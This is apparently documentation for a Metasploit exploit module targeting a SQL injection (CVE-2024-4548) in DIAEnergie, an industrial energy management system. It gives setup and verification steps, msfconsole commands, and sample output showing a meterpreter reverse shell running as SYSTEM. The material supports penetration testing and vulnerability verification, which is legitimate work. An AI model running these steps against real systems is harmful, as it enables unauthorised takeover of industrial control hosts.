## Vulnerable Application

**Vulnerability Description**

This module exploits a SQL injection vulnerability in DIAEnergie <= v8.28.0 (CVE-2024-4548).

An unauthenticated remote attacker can exploit this vulnerability to inject an arbitrary script through a SQL injection vulnerability, which
can then be executed in the context of `NT AUTHORITY\SYSTEM`. The vulnerability is within the CEBC service, which listens by default on TCP
port 928. It accepts various user-controlled data, including `RecalculateHDMWYC` messages, which are insufficiently validated before using
them as part of a SQL query.

Versions <= 1.10.1.8610 are affected. Tenable published [TRA-2024-13](https://www.tenable.com/security/research/tra-2024-13) to cover the
security issues.

**Vulnerable Application Installation**

A trial version of the software can be obtained from [the vendor]
(https://downloadcenter.deltaww.com/downloadCenterCounter.aspx?DID=39969&DocPath=1&hl=en-US).
For the product to work correctly, SQL Server (e.g., SQL Server Express) needs to be installed.

**Successfully tested on**

- DIAEnergie v1.10 on Windows 10 22H2
- DIAEnergie v1.9 on Windows 10 22H2

## Verification Steps

1. Install the SQL Server (Express)
2. Install DIAEnergie
3. Start `msfconsole` and run the following commands:

```
msf > use exploit/windows/scada/diaenergie_sqli
[*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp
msf exploit(windows/scada/diaenergie_sqli) > set RHOSTS <IP>
msf exploit(windows/scada/diaenergie_sqli) > exploit
```

You should get a meterpreter session in the context of `NT AUTHORITY\SYSTEM`.

## Scenarios

Running the exploit against DIAEnergie v1.10 on Windows 10 22H2, using curl as a fetch command, should result in an output similar to the
following:

```
msf exploit(windows/scada/diaenergie_sqli) > exploit

[*] Started reverse TCP handler on 192.168.1.241:4444 
[*] 192.168.1.245:928 - Running automatic check ("set AutoCheck false" to disable)
[+] 192.168.1.245:928 - The target appears to be vulnerable.
[*] 192.168.1.245:928 - Sending SQL injection...
[*] 192.168.1.245:928 - Triggering script execution...
[*] 192.168.1.245:928 - Cleaning up database...
[+] 192.168.1.245:928 - Script successfully injected, check thy shell.
[*] Sending stage (201798 bytes) to 192.168.1.245
[*] Meterpreter session 1 opened (192.168.1.241:4444 -> 192.168.1.245:50605) at 2024-07-29 23:59:53 -0400

meterpreter > shell
Process 6392 created.
Channel 1 created.
Microsoft Windows [Version 10.0.19045.4529]
(c) Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
whoami
nt authority\system
```
